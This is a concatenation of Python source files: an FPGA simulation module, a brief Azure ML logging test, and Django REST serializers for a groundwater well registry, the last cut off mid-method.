import numpy as np
class Simu(Module):
def __init__(self, fpga_config):
self.func_layout = fpga_config.func_layout
self.mem_nb = fpga_config.config['mem_nb']
self.ddr2fpga_nb = fpga_config.config['ddr2fpga_nb']
self.fpga2ddr_nb = fpga_config.config['fpga2ddr_nb']
self.func_nb = fpga_config.config['func_nb']
self.iter_nb = fpga_config.config['iter_nb']
self.mem_depth = fpga_config.config['mem_depth']
self.chunk_array = [[0 for j in range(fpga_config.config['mem_depth'])] for i in range(fpga_config.config['mem_nb'])]
#self.chunk_array = [np.zeros(fpga_config.config['mem_depth'], dtype=np.uint64) for i in range(fpga_config.config['mem_nb'])]
self.cycle_nb = -1
self.randmax = 2
self.trace = None
# memories
self.u_mem = List()
self.s_mem_wena = List()
self.s_mem_addr = List()
self.s_mem_din = List()
self.s_mem_dout = List()
for i in range(self.mem_nb):
self.s_mem_wena[i] = Sig()
self.s_mem_addr[i] = Sig()
self.s_mem_din[i] = Sig()
self.s_mem_dout[i] = Sig()
self.u_mem[i] = _ = memory(self.mem_depth)
_.i_wena (self.s_mem_wena[i])
_.i_addr (self.s_mem_addr[i])
_.i_din (self.s_mem_din[i])
_.o_dout (self.s_mem_dout[i])
# ddr2fpga
self.u_ddr2fpga = List()
self.s_ddr2fpga_mem_i = List()
self.s_ddr2fpga_data_nb = List()
self.s_ddr2fpga_done = List()
self.s_ddr2fpga_wena = List()
self.s_ddr2fpga_addr = List()
self.s_ddr2fpga_din = List()
for i in range(self.ddr2fpga_nb):
self.s_ddr2fpga_mem_i[i] = Sig()
self.s_ddr2fpga_data_nb[i] = Sig()
self.s_ddr2fpga_done[i] = Sig()
self.s_ddr2fpga_wena[i] = Sig()
self.s_ddr2fpga_addr[i] = Sig()
self.s_ddr2fpga_din[i] = Sig()
self.u_ddr2fpga[i] = _ = ddr2fpga()
_.i_data_nb (self.s_ddr2fpga_data_nb[i])
_.o_done (self.s_ddr2fpga_done[i])
_.o_mem_wena (self.s_ddr2fpga_wena[i])
_.o_mem_addr (self.s_ddr2fpga_addr[i])
_.o_mem_din (self.s_ddr2fpga_din[i])
# fpga2ddr
self.s_fpga2ddr_mem_i = List()
self.s_fpga2ddr_data_nb = List()
self.s_fpga2ddr_done = List()
self.s_fpga2ddr_addr = List()
self.s_fpga2ddr_mem_dout = List()
self.u_fpga2ddr = List()
for i in range(self.fpga2ddr_nb):
self.s_fpga2ddr_mem_dout[i] = Sig()
self.s_fpga2ddr_addr[i] = Sig()
self.s_fpga2ddr_mem_i[i] = Sig()
self.s_fpga2ddr_data_nb[i] = Sig()
self.s_fpga2ddr_done[i] = Sig()
self.u_fpga2ddr[i] = _ = fpga2ddr()
_.i_data_nb (self.s_fpga2ddr_data_nb[i])
_.o_done (self.s_fpga2ddr_done[i])
_.o_mem_addr (self.s_fpga2ddr_addr[i])
_.i_mem_dout (self.s_fpga2ddr_mem_dout[i])
# iterators
self.u_iter = List()
self.s_iter_data_nb = List()
self.s_iter_done = List()
self.s_iter_raddr = List()
self.s_iter_waddr = List()
self.s_iter_wena = List()
self.s_iter_arg_valid = List()
self.s_iter_res_valid = List()
for i in range(self.iter_nb):
self.s_iter_data_nb[i] = Sig()
self.s_iter_done[i] = Sig()
self.s_iter_raddr[i] = Sig()
self.s_iter_waddr[i] = Sig()
self.s_iter_wena[i] = Sig()
self.s_iter_arg_valid[i] = Sig()
self.s_iter_res_valid[i] = Sig()
self.u_iter[i] = _ = iterator()
_.i_data_nb (self.s_iter_data_nb[i])
_.o_done (self.s_iter_done[i])
_.o_raddr (self.s_iter_raddr[i])
_.o_waddr (self.s_iter_waddr[i])
_.o_wena (self.s_iter_wena[i])
_.o_arg_valid (self.s_iter_arg_valid[i])
_.i_res_valid (self.s_iter_res_valid[i])
# functions
self.u_func = List()
self.s_func_arg0 = List()
self.s_func_arg1 = List()
self.s_func_arg_valid = List()
self.s_func_res = List()
self.s_func_res_valid = List()
i = 0
for fname, fnb in self.func_layout.items():
for j in range(fnb):
self.s_func_arg0[i] = Sig()
self.s_func_arg1[i] = Sig()
self.s_func_arg_valid[i] = Sig()
self.s_func_res[i] = Sig()
self.s_func_res_valid[i] = Sig()
self.u_func[i] = _ = func(fname)
_.i_arg0 (self.s_func_arg0[i])
_.i_arg1 (self.s_func_arg1[i])
_.i_arg_valid (self.s_func_arg_valid[i])
_.o_res (self.s_func_res[i])
_.o_res_valid (self.s_func_res_valid[i])
i += 1
self.s_iter_rmem0_i = List()
self.s_iter_rmem1_i = List()
self.s_iter_wmem_i = List()
self.s_iter_func_i = List()
for i in range(self.iter_nb):
self.s_iter_rmem0_i[i] = Sig()
self.s_iter_rmem1_i[i] = Sig()
self.s_iter_wmem_i[i] = Sig()
self.s_iter_func_i[i] = Sig()
self.state = FPGA_state(fpga_config)
self.config = fpga_config.config
def logic(self):
# DDR <-> memory
for i in range(self.mem_nb):
self.s_mem_addr[i].d = 0
self.s_mem_din[i].d = 0
self.s_mem_wena[i].d = 0
for i in range(self.fpga2ddr_nb):
self.s_mem_addr[self.s_fpga2ddr_mem_i[i].d].d += self.s_fpga2ddr_addr[i].d
self.s_fpga2ddr_mem_dout[i].d = self.s_mem_dout[self.s_fpga2ddr_mem_i[i].d].d
for i in range(self.ddr2fpga_nb):
self.s_mem_wena[self.s_ddr2fpga_mem_i[i].d].d += self.s_ddr2fpga_wena[i].d
self.s_mem_addr[self.s_ddr2fpga_mem_i[i].d].d += self.s_ddr2fpga_addr[i].d
self.s_mem_din[self.s_ddr2fpga_mem_i[i].d].d += self.s_ddr2fpga_din[i].d
# memory <-> iterator <-> function
for i in range(self.func_nb):
self.s_func_arg_valid[i].d = 0
self.s_func_arg0[i].d = 0
self.s_func_arg1[i].d = 0
for i in range(self.iter_nb):
self.s_mem_addr[self.s_iter_rmem0_i[i].d].d += self.s_iter_raddr[i].d
self.s_mem_addr[self.s_iter_rmem1_i[i].d].d += self.s_iter_raddr[i].d
self.s_mem_addr[self.s_iter_wmem_i[i].d].d += self.s_iter_waddr[i].d
self.s_mem_wena[self.s_iter_wmem_i[i].d].d += self.s_iter_wena[i].d
self.s_func_arg_valid[self.s_iter_func_i[i].d].d += self.s_iter_arg_valid[i].d
self.s_iter_res_valid[i].d = self.s_func_res_valid[self.s_iter_func_i[i].d].d
if self.s_iter_data_nb[i].d != 0:
self.s_mem_din[self.s_iter_wmem_i[i].d].d += self.s_func_res[self.s_iter_func_i[i].d].d
if self.s_iter_arg_valid[i].d == 1:
self.s_func_arg0[self.s_iter_func_i[i].d].d += self.s_mem_dout[self.s_iter_rmem0_i[i].d].d
self.s_func_arg1[self.s_iter_func_i[i].d].d += self.s_mem_dout[self.s_iter_rmem1_i[i].d].d
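    # Note (explanatory comment, not original code): every potential driver of
    # a shared memory/function signal in logic() writes 0 when idle, so the
    # `+=` accumulation above acts as a wired-OR mux -- only the active driver
    # contributes a non-zero value in a given cycle.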
def set_cycle_nb(self, cycle_nb=-1):
self.cycle_nb = cycle_nb
def set_trace(self, trace):
self.trace = trace
async def op(self, iter_i, func_i, rmem0_i, rmem1_i, wmem_i, data_nb):
# operation request
self.s_iter_data_nb[iter_i].d = data_nb
self.s_iter_func_i[iter_i].d = func_i
self.s_iter_rmem0_i[iter_i].d = rmem0_i
self.s_iter_rmem1_i[iter_i].d = rmem1_i
self.s_iter_wmem_i[iter_i].d = wmem_i
clkNb = randint(1, self.randmax)
self.run(clkNb=clkNb, trace=self.trace)
# operation completion check
# software is polling, run the FPGA
done = False
while not done:
if (self.cycle_nb >= 0) and (self.time >= self.cycle_nb):
return
if self.s_iter_done[iter_i].d == 1:
self.s_iter_data_nb[iter_i].d = 0
done = True
clkNb = randint(1, self.randmax)
self.run(clkNb=clkNb, trace=self.trace)
await asyncio.sleep(0)
async def ddr2fpga(self, ddr2fpga_i, mem_i, array_ptr, data_nb):
# memory write
self.s_ddr2fpga_mem_i[ddr2fpga_i].d = mem_i
self.s_ddr2fpga_data_nb[ddr2fpga_i].d = data_nb
self.u_ddr2fpga[ddr2fpga_i].array_ptr = array_ptr
clkNb = randint(1, self.randmax)
self.run(clkNb=clkNb, trace=self.trace)
# memory copy completion check
# software is polling, run the FPGA
done = False
while not done:
if (self.cycle_nb >= 0) and (self.time >= self.cycle_nb):
return
if self.s_ddr2fpga_done[ddr2fpga_i].d == 1:
self.s_ddr2fpga_data_nb[ddr2fpga_i].d = 0
done = True
clkNb = randint(1, self.randmax)
self.run(clkNb=clkNb, trace=self.trace)
await asyncio.sleep(0)
async def fpga2ddr(self, fpga2ddr_i, mem_i, array_ptr, data_nb):
# memory read
self.s_fpga2ddr_mem_i[fpga2ddr_i].d = mem_i
self.s_fpga2ddr_data_nb[fpga2ddr_i].d = data_nb
self.u_fpga2ddr[fpga2ddr_i].array_ptr = array_ptr
clkNb = randint(1, self.randmax)
self.run(clkNb=clkNb, trace=self.trace)
# memory copy completion check
# software is polling, run the FPGA
done = False
while not done:
if (self.cycle_nb >= 0) and (self.time >= self.cycle_nb):
return
if self.s_fpga2ddr_done[fpga2ddr_i].d == 1:
self.s_fpga2ddr_data_nb[fpga2ddr_i].d = 0
done = True
clkNb = randint(1, self.randmax)
self.run(clkNb=clkNb, trace=self.trace)
await asyncio.sleep(0)
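    # --- Illustrative sketch (assumption, not part of the original module) ---
    # The polling loops in op/ddr2fpga/fpga2ddr share the same shape and could
    # be factored into one coroutine. (This sketch returns as soon as done
    # asserts; the originals run one more random clock batch afterwards.)
    async def _poll_done_sketch(self, done_sig, data_nb_sig):
        while True:
            if (self.cycle_nb >= 0) and (self.time >= self.cycle_nb):
                return
            if done_sig.d == 1:
                data_nb_sig.d = 0
                return
            self.run(clkNb=randint(1, self.randmax), trace=self.trace)
            await asyncio.sleep(0)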
| 40.030075 | 133 | 0.569121 |
535688dcc1be638fb3f4ac69eaf05a7fffab4d3e | 432 | py | Python | user/mutaz/test-aml.py | mutazag/imagecaptioning | 9933aebc750dfdb1d50d9e0a803acf24119a0cb3 | [
"MIT"
] | null | null | null | user/mutaz/test-aml.py | mutazag/imagecaptioning | 9933aebc750dfdb1d50d9e0a803acf24119a0cb3 | [
"MIT"
] | null | null | null | user/mutaz/test-aml.py | mutazag/imagecaptioning | 9933aebc750dfdb1d50d9e0a803acf24119a0cb3 | [
"MIT"
] | null | null | null | #conda activate py36
import sys
from azureml.core import VERSION
print("python version: " , sys.version)
print("azureml version: ", VERSION)
# enable logging
# https://docs.microsoft.com/en-us/azure/machine-learning/service/how-to-enable-logging
from azureml.core import Workspace, Experiment, Run
# NOTE: Workspace.create() requires a workspace name, subscription id and
# resource group; assuming a config.json downloaded from the Azure portal is
# present, from_config() is the minimal way to get a workspace handle here.
ws = Workspace.from_config()
exp = Experiment(workspace=ws, name='test_experiment')
run = exp.start_logging()
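# Illustrative note (assumption, not original code): a tidied version of this
# smoke test would also call run.complete() after the final log call so the
# run does not stay in a 'Running' state in the workspace.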
run.log("test-val", 10) | 19.636364 | 88 | 0.75 |
c2497e8ea4d4cb89e9c7996176c5fb54e6cd6756 | 41,627 | py | Python | app/backend/wells/serializers.py | bcgov/gwells | 7d69e65e993d37070961e06e6ce9c58a02d79363 | [
"Apache-2.0"
] | 37 | 2017-06-30T18:08:51.000Z | 2022-02-13T18:04:10.000Z | app/backend/wells/serializers.py | bcgov/gwells | 7d69e65e993d37070961e06e6ce9c58a02d79363 | [
"Apache-2.0"
] | 544 | 2017-06-21T00:29:20.000Z | 2022-02-01T21:37:38.000Z | app/backend/wells/serializers.py | bcgov/gwells | 7d69e65e993d37070961e06e6ce9c58a02d79363 | [
"Apache-2.0"
] | 59 | 2017-03-10T17:55:02.000Z | 2021-11-16T19:20:08.000Z | """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
from decimal import Decimal
from rest_framework import serializers
from django.db import transaction
from django.core.validators import MinValueValidator
from gwells.models import ProvinceStateCode
from gwells.serializers import AuditModelSerializer
from aquifers.serializers import HYDRAULIC_SUBTYPES
from registries.serializers import PersonNameSerializer, OrganizationNameListSerializer
from wells.models import (
ActivitySubmission,
ActivitySubmissionLinerPerforation,
AquiferLithologyCode,
Casing,
CasingMaterialCode,
CasingCode,
DecommissionDescription,
DrillingMethodCode,
LinerPerforation,
LithologyDescription,
Screen,
Well
)
from submissions.models import WellActivityCode
logger = logging.getLogger(__name__)
class CasingMaterialSerializer(serializers.ModelSerializer):
class Meta:
model = CasingMaterialCode
fields = (
'code',
'description'
)
class CasingCodeSerializer(serializers.ModelSerializer):
class Meta:
model = CasingCode
fields = (
'code',
'description',
)
class CasingSummarySerializer(serializers.ModelSerializer):
"""Serializes casings for well summary (using descriptions instead of codes)"""
casing_material = serializers.ReadOnlyField(source='casing_material.description')
casing_code = serializers.ReadOnlyField(source='casing_code.description')
class Meta:
model = Casing
fields = (
'start',
'end',
'diameter',
'casing_code',
'casing_material',
'drive_shoe_status',
'wall_thickness'
)
class CasingSerializer(serializers.ModelSerializer):
length_required = serializers.BooleanField(required=False)
class Meta:
model = Casing
fields = (
'start',
'end',
'length_required',
'diameter',
'casing_code',
'casing_material',
'drive_shoe_status',
'wall_thickness'
)
extra_kwargs = {
'start': {'required': False},
'end': {'required': False},
'diameter': {'required': True}
}
def to_representation(self, instance):
"""
        Add the computed length_required flag: true when both start and end are set.
"""
ret = super().to_representation(instance)
ret['length_required'] = instance.start is not None and instance.end is not None
return ret
def validate(self, data):
"""
Check that start and end are set when the `requiredLength` parameter is true.
"""
data = super().validate(data)
if bool(data.get('length_required', True)):
errors = {}
start = data.get('start', None)
end = data.get('end', None)
if start == '' or start is None:
errors['start'] = 'This field is required.'
if end == '' or end is None:
errors['end'] = 'This field is required.'
if len(errors) != 0:
raise serializers.ValidationError(errors)
if 'length_required' in data:
del data['length_required']
return data
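# Illustrative usage (assumption, not original code):
#   s = CasingSerializer(data={'diameter': 6, 'length_required': False, ...})
#   s.is_valid()   # open-ended casing: start/end not enforced
#   s = CasingSerializer(data={'diameter': 6, ...})
#   s.is_valid()   # fails with 'start'/'end': 'This field is required.'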
class CasingStackerSerializer(serializers.ModelSerializer):
class Meta:
model = Casing
fields = (
'start',
'end',
'diameter',
'casing_code',
'casing_material',
'drive_shoe_status',
'wall_thickness',
'create_user',
'update_user'
)
        extra_kwargs = {
            'start': {'required': True},
            'end': {'required': True},
            'diameter': {'required': True},
            'create_user': {'required': True},
            'update_user': {'required': True}
        }
class LegacyCasingSerializer(serializers.ModelSerializer):
# Serializers without validators:
start = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
end = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
diameter = serializers.DecimalField(max_digits=8, decimal_places=3, allow_null=True)
wall_thickness = serializers.DecimalField(max_digits=6, decimal_places=3, allow_null=True)
class Meta:
model = Casing
fields = (
'start',
'end',
'diameter',
'casing_code',
'casing_material',
'drive_shoe_status',
'wall_thickness'
)
extra_kwargs = {
'start': {'required': False},
'end': {'required': False},
'diameter': {'required': False},
'casing_code': {'required': False},
'casing_material': {'required': False},
'drive_shoe_status': {'required': False, 'allow_null': True},
'wall_thickness': {'required': False}
}
class DecommissionDescriptionSerializer(serializers.ModelSerializer):
"""Serializes Decommission Descriptions"""
class Meta:
model = DecommissionDescription
fields = (
'start',
'end',
'material',
'observations'
)
extra_kwargs = {
'start': {'required': True},
'end': {'required': True},
}
class DecommissionDescriptionStackerSerializer(serializers.ModelSerializer):
"""Serializes Decommission Descriptions"""
class Meta:
model = DecommissionDescription
fields = (
'start',
'end',
'material',
'observations',
'create_user',
'update_user'
)
extra_kwargs = {
'start': {'required': True},
'end': {'required': True},
'create_user': {'required': True},
'update_user': {'required': True}
}
class LegacyDecommissionDescriptionSerializer(serializers.ModelSerializer):
"""Serializes Decommission Descriptions"""
class Meta:
model = DecommissionDescription
fields = (
'start',
'end',
'material',
'observations'
)
extra_kwargs = {
'start': {'required': False},
'end': {'required': False},
}
class ScreenSerializer(serializers.ModelSerializer):
class Meta:
model = Screen
fields = (
'start',
'end',
'diameter',
'assembly_type',
'slot_size',
)
extra_kwargs = {
'start': {'required': True},
'end': {'required': True},
'assembly_type': {'required': True}
}
class ScreenStackerSerializer(serializers.ModelSerializer):
class Meta:
model = Screen
fields = (
'start',
'end',
'diameter',
'assembly_type',
'slot_size',
'create_user',
'update_user'
)
extra_kwargs = {
'start': {'required': True},
'end': {'required': True},
'assembly_type': {'required': True},
'create_user': {'required': True},
'update_user': {'required': True}
}
class LegacyScreenSerializer(serializers.ModelSerializer):
start = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
end = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
diameter = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
slot_size = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
class Meta:
model = Screen
fields = (
'start',
'end',
'diameter',
'assembly_type',
'slot_size',
)
extra_kwargs = {
'start': {'required': False},
'end': {'required': False},
'assembly_type': {'required': False}
}
class LinerPerforationSerializer(serializers.ModelSerializer):
class Meta:
model = LinerPerforation
fields = (
# SUPER IMPORTANT: Don't include ID (liner_perforation_guid, well, or submission) as part of this
# serializer, as it will break the stacking code. If you include the guid, then it will remain
            # stuck on a particular well/submission (unless, I guess, you pop it during serializing/
# deserializing) when creating legacy submissions or re-creating well records etc.
'start',
'end',
)
class LinerPerforationStackerSerializer(serializers.ModelSerializer):
""" This serializer is used for data->perforation(on well) and perforation(on well)->data.
"""
class Meta:
model = LinerPerforation
fields = (
# SUPER IMPORTANT: Don't include ID (liner_perforation_guid, well, or submission) as part of this
# serializer, as it will break the stacking code. If you include the guid, then it will remain
            # stuck on a particular well/submission (unless, I guess, you pop it during serializing/
# deserializing) when creating legacy submissions or re-creating well records etc.
'start',
'end',
'create_user',
'update_user'
)
extra_kwargs = {
'create_user': {'required': True},
'update_user': {'required': True}
}
class ActivitySubmissionLinerPerforationSerializer(serializers.ModelSerializer):
""" This serializer is used for data->perforation(on submission) and perforation(on submission)->data.
"""
class Meta:
model = ActivitySubmissionLinerPerforation
fields = (
# SUPER IMPORTANT: Don't include ID (liner_perforation_guid, well, or submission) as part of this
# serializer, as it will break the stacking code. If you include the guid, then it will remain
            # stuck on a particular well/submission (unless, I guess, you pop it during serializing/
# deserializing) when creating legacy submissions or re-creating well records etc.
'start',
'end',
)
class LegacyLinerPerforationSerializer(serializers.ModelSerializer):
class Meta:
model = ActivitySubmissionLinerPerforation
fields = (
# SUPER IMPORTANT: Don't include ID (liner_perforation_guid, well, or submission) as part of this
# serializer, as it will break the stacking code. If you include the guid, then it will remain
            # stuck on a particular well/submission (unless, I guess, you pop it during serializing/
# deserializing) when creating legacy submissions or re-creating well records etc.
'start',
'end',
)
extra_kwargs = {
'start': {'required': False},
'end': {'required': False},
}
class LithologyDescriptionSummarySerializer(serializers.ModelSerializer):
"""Serializes lithology description records for the well summary, using descriptions instead of codes"""
lithology_description = serializers.ReadOnlyField(source='lithology_description.description')
lithology_colour = serializers.ReadOnlyField(source='lithology_colour.description')
lithology_hardness = serializers.ReadOnlyField(source='lithology_hardness.description')
lithology_moisture = serializers.ReadOnlyField(source='lithology_moisture.description')
class Meta:
model = LithologyDescription
fields = (
'start',
'end',
'lithology_raw_data',
'lithology_colour',
'lithology_hardness',
'lithology_moisture',
'lithology_description',
'lithology_observation',
'water_bearing_estimated_flow',
)
class LithologyDescriptionSerializer(serializers.ModelSerializer):
start = serializers.DecimalField(
max_digits=7, decimal_places=2,
validators=[MinValueValidator(Decimal('0.00'))])
end = serializers.DecimalField(
max_digits=7, decimal_places=2,
validators=[MinValueValidator(Decimal('0.00'))])
"""Serializes lithology description records"""
class Meta:
model = LithologyDescription
fields = (
'start',
'end',
'lithology_raw_data',
'lithology_colour',
'lithology_hardness',
'lithology_moisture',
'lithology_description',
'lithology_observation',
'water_bearing_estimated_flow',
)
class LithologyDescriptionStackerSerializer(serializers.ModelSerializer):
start = serializers.DecimalField(
max_digits=7, decimal_places=2,
validators=[MinValueValidator(Decimal('0.00'))])
end = serializers.DecimalField(
max_digits=7, decimal_places=2,
validators=[MinValueValidator(Decimal('0.00'))])
"""Serializes lithology description records"""
class Meta:
model = LithologyDescription
fields = (
'start',
'end',
'lithology_raw_data',
'lithology_colour',
'lithology_hardness',
'lithology_moisture',
'lithology_description',
'lithology_observation',
'water_bearing_estimated_flow',
'create_user',
'update_user'
)
extra_kwargs = {
'start': {'required': True},
'end': {'required': True},
'create_user': {'required': True},
'update_user': {'required': True}
}
class LegacyLithologyDescriptionSerializer(serializers.ModelSerializer):
end = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
"""Serializes lithology description records"""
class Meta:
model = LithologyDescription
fields = (
'start',
'end',
'lithology_raw_data',
'lithology_colour',
'lithology_hardness',
'lithology_moisture',
'lithology_description',
'lithology_observation',
'water_bearing_estimated_flow',
)
extra_kwargs = {
'end': {'required': False, 'allow_null': True},
}
class DrillingMethodSummarySerializer(serializers.ModelSerializer):
""" serializes drilling methods for well summary display """
class Meta:
model = DrillingMethodCode
fields = ('description',)
class WellDetailSerializer(AuditModelSerializer):
casing_set = CasingSummarySerializer(many=True)
screen_set = ScreenSerializer(many=True)
linerperforation_set = LinerPerforationSerializer(many=True)
decommission_description_set = DecommissionDescriptionSerializer(many=True)
person_responsible = PersonNameSerializer()
lithologydescription_set = LithologyDescriptionSummarySerializer(many=True)
drilling_methods = DrillingMethodSummarySerializer(many=True)
# well vs. well_tag_number ; on submissions, we refer to well
well = serializers.IntegerField(source='well_tag_number')
# convert codes to their human-readable descriptions
well_class = serializers.ReadOnlyField(source='well_class.description')
well_subclass = serializers.ReadOnlyField(source='well_subclass.description')
intended_water_use = serializers.ReadOnlyField(source='intended_water_use.description')
well_status = serializers.ReadOnlyField(source='well_status.description')
well_publication_status = serializers.ReadOnlyField(source='well_publication_status.description')
licenced_status = serializers.ReadOnlyField(source='licenced_status.description')
coordinate_acquisition_code = serializers.ReadOnlyField(source='coordinate_acquisition_code.description')
ground_elevation_method = serializers.ReadOnlyField(source='ground_elevation_method.description')
surface_seal_material = serializers.ReadOnlyField(source='surface_seal_material.description')
surface_seal_method = serializers.ReadOnlyField(source='surface_seal_method.description')
liner_material = serializers.ReadOnlyField(source='liner_material.description')
screen_intake_method = serializers.ReadOnlyField(source='screen_intake_method.description')
screen_type = serializers.ReadOnlyField(source='screen_type.description')
screen_material = serializers.ReadOnlyField(source='screen_material.description')
screen_opening = serializers.ReadOnlyField(source='screen_opening.description')
screen_bottom = serializers.ReadOnlyField(source='screen_bottom.description')
alternative_specs_submitted = serializers.ReadOnlyField(source='get_alternative_specs_submitted_display')
drilling_company = serializers.ReadOnlyField(source='company_of_person_responsible.org_guid')
company_of_person_responsible = serializers.ReadOnlyField(source='company_of_person_responsible.org_guid')
submission_work_dates = serializers.SerializerMethodField()
legal_pid = serializers.SerializerMethodField()
is_published = serializers.SerializerMethodField()
def get_legal_pid(self, instance):
if instance.legal_pid is None:
return instance.legal_pid
return "{0:0>9}".format(instance.legal_pid)
def get_submission_work_dates(self, instance):
records = instance.activitysubmission_set \
.exclude(well_activity_type='STAFF_EDIT') \
.order_by('create_date')
        # Descending sort on (is-not-legacy, is-not-construction, create_date):
        # newest records first within each group, construction reports after
        # the other activity types, and legacy records last.
        records = sorted(records, key=lambda record:
                         (record.well_activity_type.code != WellActivityCode.types.legacy().code,
                          record.well_activity_type.code != WellActivityCode.types.construction().code,
                          record.create_date), reverse=True)
return SubmissionWorkDatesByWellSerializer(records, many=True).data
def get_is_published(self, instance):
return instance.well_publication_status.well_publication_status_code == 'Published'
class Meta:
ref_name = "well_detail_v1"
model = Well
fields = (
"well_guid",
"well",
"well_tag_number",
"identification_plate_number",
"owner_full_name",
# "owner_mailing_address", # temporarily disabled - required for staff, hidden for public
# "owner_city",
# "owner_province_state",
# "owner_postal_code",
"well_class",
"well_subclass",
"intended_water_use",
"well_status",
"well_publication_status",
"licenced_status",
"street_address",
"city",
"legal_lot",
"legal_plan",
"legal_district_lot",
"legal_block",
"legal_section",
"legal_township",
"legal_range",
"land_district",
"legal_pid",
"well_location_description",
"construction_start_date",
"construction_end_date",
"alteration_start_date",
"alteration_end_date",
"decommission_start_date",
"decommission_end_date",
"person_responsible",
"driller_name",
"drilling_company", # old name for company_of_person_responsible
"company_of_person_responsible",
"consultant_name",
"consultant_company",
"well_identification_plate_attached",
"id_plate_attached_by",
"water_supply_system_name",
"water_supply_system_well_name",
"latitude",
"longitude",
"coordinate_acquisition_code",
"ground_elevation",
"ground_elevation_method",
"drilling_methods",
"well_orientation_status",
"surface_seal_material",
"surface_seal_thickness",
"surface_seal_method",
"surface_seal_depth",
"backfill_type",
"backfill_depth",
"liner_material",
"liner_diameter",
"liner_thickness",
"liner_from",
"liner_to",
"screen_intake_method",
"screen_type",
"screen_material",
"other_screen_material",
"screen_opening",
"screen_bottom",
"other_screen_bottom",
"screen_information",
"filter_pack_from",
"filter_pack_to",
"filter_pack_thickness",
"filter_pack_material",
"filter_pack_material_size",
"development_methods",
"development_hours",
"development_notes",
"water_quality_characteristics",
"water_quality_colour",
"water_quality_odour",
"total_depth_drilled",
"finished_well_depth",
"final_casing_stick_up",
"bedrock_depth",
"water_supply_system_name",
"water_supply_system_well_name",
"static_water_level",
"well_yield",
"artesian_flow",
"artesian_pressure",
"artesian_pressure_head",
"artesian_conditions",
"well_cap_type",
"well_disinfected_status",
"comments",
"alternative_specs_submitted",
"well_yield_unit",
"diameter",
"observation_well_number",
"observation_well_status",
"ems",
"aquifer",
"utm_zone_code",
"utm_northing",
"utm_easting",
"bcgs_id",
"decommission_reason",
"decommission_method",
"decommission_sealant_material",
"decommission_backfill_material",
"decommission_details",
"aquifer_vulnerability_index",
"aquifer_lithology",
"storativity",
"transmissivity",
"hydraulic_conductivity",
"specific_storage",
"specific_yield",
"testing_method",
"testing_duration",
"analytic_solution_type",
"boundary_effect",
"yield_estimation_method",
"yield_estimation_rate",
"yield_estimation_duration",
"well_yield_unit",
"static_level_before_test",
"drawdown",
"hydro_fracturing_performed",
"hydro_fracturing_yield_increase",
"recommended_pump_depth",
"recommended_pump_rate",
"casing_set",
"screen_set",
"linerperforation_set",
"decommission_description_set",
"lithologydescription_set",
"submission_work_dates",
"is_published",
)
class SubmissionReportsByWellSerializer(serializers.ModelSerializer):
""" serializes a list of submission reports for a given well, with basic info about each report """
well_activity_description = serializers.ReadOnlyField(
source='well_activity_type.description')
class Meta:
model = ActivitySubmission
fields = ("well", "well_activity_type", "create_user",
"create_date", "well_activity_description", "filing_number")
class SubmissionWorkDatesByWellSerializer(serializers.ModelSerializer):
""" serializes a list of submission report work done information """
well_activity_description = serializers.ReadOnlyField(
source='well_activity_type.description')
drilling_company = serializers.ReadOnlyField(
source='company_of_person_responsible.name')
class Meta:
model = ActivitySubmission
fields = ("well", "create_date", "well_activity_description",
"work_start_date", "work_end_date", "drilling_company")
class WellDetailAdminSerializer(AuditModelSerializer):
casing_set = CasingSerializer(many=True)
screen_set = ScreenSerializer(many=True)
linerperforation_set = LinerPerforationSerializer(many=True)
decommission_description_set = DecommissionDescriptionSerializer(many=True)
person_responsible = PersonNameSerializer()
company_of_person_responsible = OrganizationNameListSerializer()
lithologydescription_set = LithologyDescriptionSerializer(many=True)
submission_reports = serializers.SerializerMethodField()
# well vs. well_tag_number ; on submissions, we refer to well
well = serializers.IntegerField(source='well_tag_number')
legal_pid = serializers.SerializerMethodField()
is_published = serializers.SerializerMethodField()
class Meta:
model = Well
fields = '__all__'
extra_fields = ['latitude', 'longitude']
def get_legal_pid(self, instance):
if instance.legal_pid is None:
return instance.legal_pid
return "{0:0>9}".format(instance.legal_pid)
# this allows us to call model methods on top of __all__
def get_field_names(self, declared_fields, info):
expanded_fields = super(WellDetailAdminSerializer, self).get_field_names(declared_fields, info)
if getattr(self.Meta, 'extra_fields', None):
return expanded_fields + self.Meta.extra_fields
else:
return expanded_fields
def get_submission_reports(self, instance):
records = instance.activitysubmission_set \
.exclude(well_activity_type='STAFF_EDIT') \
.order_by('create_date')
        # Same ordering as get_submission_work_dates: newest first within each
        # group, construction reports after other types, legacy records last.
        records = sorted(records, key=lambda record:
                         (record.well_activity_type.code != WellActivityCode.types.legacy().code,
                          record.well_activity_type.code != WellActivityCode.types.construction().code,
                          record.create_date), reverse=True)
return SubmissionReportsByWellSerializer(records, many=True).data
def get_is_published(self, instance):
return instance.well_publication_status.well_publication_status_code == 'Published'
class WellStackerSerializer(AuditModelSerializer):
casing_set = CasingStackerSerializer(many=True)
screen_set = ScreenStackerSerializer(many=True)
linerperforation_set = LinerPerforationStackerSerializer(many=True)
decommission_description_set = DecommissionDescriptionStackerSerializer(many=True)
lithologydescription_set = LithologyDescriptionStackerSerializer(many=True)
# Audit fields have to be added explicitly, because they are on a base class
update_user = serializers.CharField(required=True)
create_user = serializers.CharField(required=True)
update_date = serializers.DateTimeField()
class Meta:
model = Well
fields = '__all__'
@transaction.atomic
def update(self, instance, validated_data):
# If there is existing related data, the easiest approach is to drop it, and re-create many to
# many fields based on this update. Trying to match up individual records and updating them,
# dealing with removed casing/screen/perforation records etc. etc. is not the responsibility
# of this section. The composite section is responsible for that.
FOREIGN_KEYS = {
'casing_set': Casing,
'screen_set': Screen,
'linerperforation_set': LinerPerforation,
'decommission_description_set': DecommissionDescription,
'lithologydescription_set': LithologyDescription,
}
for key in FOREIGN_KEYS.keys():
# Is the field one to many, or many to many?
